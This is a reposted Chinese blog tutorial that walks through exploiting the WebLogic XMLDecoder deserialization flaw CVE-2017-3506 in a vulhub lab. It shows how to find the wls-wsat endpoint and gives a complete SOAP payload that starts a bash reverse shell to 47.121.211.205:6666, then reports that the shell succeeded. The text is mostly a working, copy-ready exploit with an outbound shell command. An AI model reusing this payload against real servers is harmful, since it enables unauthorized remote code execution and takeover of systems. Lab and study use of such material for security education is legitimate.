自学内容网 自学内容网

webLogic反序列化漏洞CVE-2017-3506

1.环境搭建

cd vulhub-master/weblogic/weak_password
docker-compose up -d

2.判断wls-wsat组件是否存在

拼接/wls-wsat/CoordinatorPortType

查看页面是否有回显  有回显说明存在组件

3.在当前页面抓包 反弹shell

添加请求包内容

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

<soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">

<object class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">

<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/47.121.211.205/6666 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

成功反弹shell


原文地址:https://blog.csdn.net/2401_82451607/article/details/142436096

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!